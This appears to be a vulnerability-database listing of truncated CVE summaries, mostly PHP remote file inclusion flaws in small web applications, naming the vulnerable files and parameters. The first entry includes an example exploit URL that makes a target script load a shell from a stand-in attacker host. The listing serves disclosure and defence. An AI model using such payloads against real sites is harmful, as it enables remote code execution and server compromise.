A-Blog menu.php navigation_start Parameter Remote File Inclusion

CVE ID: 2006-5092 see also: NVD Bugtraq ID: 20230 有一个安全漏洞可能允许远程攻击者执行任意命令。这个问题是由于menu.php脚本没有正确消毒用户输入提供给'navigationstart'变量。这可能允许攻击者包括从远程主机包含将由脆弱的脚本执行任意命令文件。 A-Blog 暂无 http://target/ablogdir/navigation/menu.php?navigationstart=http://attacker/shell.php?...

CVE-2009-3331

Multiple PHP remote file inclusion vulnerabilities in DDL CMS 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the wwwRoot parameter to 1 header.php, 2 submit.php, 3 submitted.php, and 4 autosubmitter/index.php...

EUVD-2009-1547

Multiple PHP remote file inclusion vulnerabilities in Qt quickteam 2 allow remote attackers to execute arbitrary PHP code via a URL in the 1 qtewebpath parameter to qteweb.php and the 2 qteroot parameter to bin/qteinit.php...

CVE-2008-6543

Multiple PHP remote file inclusion vulnerabilities in ComScripts TEAM Quick Classifieds 1.0 via the DOCUMENTROOT parameter to 1 index.php3, 2 locate.php3, 3 searchresults.php3, 4 classifieds/index.php3, and 5 classifieds/view.php3; 6 index.php3, 7 manager.php3, 8 pass.php3, 9 remember.php3 10...

CVE-2008-6421

PHP remote file inclusion vulnerability in socialgameplay.php in Social Site Generator SSG 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the path parameter...

CVE-2008-6377

PHP remote file inclusion vulnerability in include/global.php in Multi SEO phpBB 1.1.0 allows remote attackers to execute arbitrary PHP code via a URL in the pfad parameter...

CVE-2008-6315

PHP remote file inclusion vulnerability in conf/core/common-tpl-vars.php in PHPmyGallery 1.0 beta2 allows remote attackers to execute arbitrary PHP code via a URL in the confdir parameter, a different issue than CVE-2008-6316...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in the Recly Interactive Feederator comfeederator component 1.0.5 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the 1 mosConfigabsolutepath parameter to a addtmsp.php, b edittmsp.php and c tmsp.php in includes/tmsp...

CVE-2008-5206

PHP remote file inclusion vulnerability in modules/modmainmenu.php in MosXML 1 Alpha allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party...

CVE-2008-5060

Multiple PHP remote file inclusion vulnerabilities in ModernBill 4.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to 1 exportbatch.inc.php, 2 runautosuspend.cron.php, and 3 sendemailcache.php in include/scripts/; 4...

CVE-2008-4911

PHP remote file inclusion vulnerability in read.php in Chattaitaliano Istant-Replay allows remote attackers to execute arbitrary PHP code via a URL in the data parameter...

CVE-2008-4529

Multiple PHP remote file inclusion vulnerabilities in asiCMS alpha 0.208 allow remote attackers to execute arbitrary PHP code via a URL in the ENVasicmspath parameter to 1 Association.php, 2 BigMath.php, 3 DiffieHellman.php, 4 DumbStore.php, 5 Extension.php, 6 FileStore.php, 7 HMAC.php, 8...

CVE-2008-4134

PHP remote file inclusion vulnerability in manager/static/view.php in phpRealty 0.03 and earlier, and possibly other versions before 0.05, allows remote attackers to execute arbitrary PHP code via a URL in the INC parameter...

FreeBSD Ports: squirrelmail, ja-squirrelmail

The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

CVE-2008-3769

PHP remote file inclusion vulnerability in admin/createordernew.php in Freeway 1.4.1.171, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the includepage parameter...

CVE-2008-3313

Multiple PHP remote file inclusion vulnerabilities in CreaCMS 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the 1 cfgdocumenturi parameter to administration/editionarticle/editionarticle.php and the 2 cfgbaseuriadmin parameter to administration/fonctions/getlistelangue.php...

Directory traversal

Multiple PHP remote file inclusion vulnerabilities in Brim formerly Booby 1.0.1 allow remote attackers to execute arbitrary PHP code via a URL in the renderer parameter to template.tpl.php in 1 barrel/, 2 barry/, 3 mylook/, 4 oerdec/, 5 penguin/, 6 sidebar/, 7 slashdot/, and 8 text-only/ in...

CVE-2008-2270

Multiple PHP remote file inclusion vulnerabilities in PHPWAY Kostenloses Linkmanagementscript allow remote attackers to execute arbitrary PHP code via a URL in the 1 mainpagedirectory and 2 pagetoinclude parameters in template\index.php...

CVE-2008-1862

ExBB Italia 0.22 and earlier are affected by PHP remote file inclusion vulnerabilities. The CVE-2008-1862 family describes checks on GET requests via QUERY_STRING that can be bypassed using POST or COOKIE variables, enabling RFI through URLs in the exbb[home_path] or new_exbb[home_path] parameter...

CVE-2008-1776

CVE-2008-1776 is a PHP remote file inclusion vulnerability in PhpBlock A8.4 where an attacker can cause arbitrary PHP code execution via a URL supplied to PATH_TO_CODE in modules/basicfog/basicfogfactory.class.php. Multiple sources (NVD entries and related records) confirm the vulnerable file and...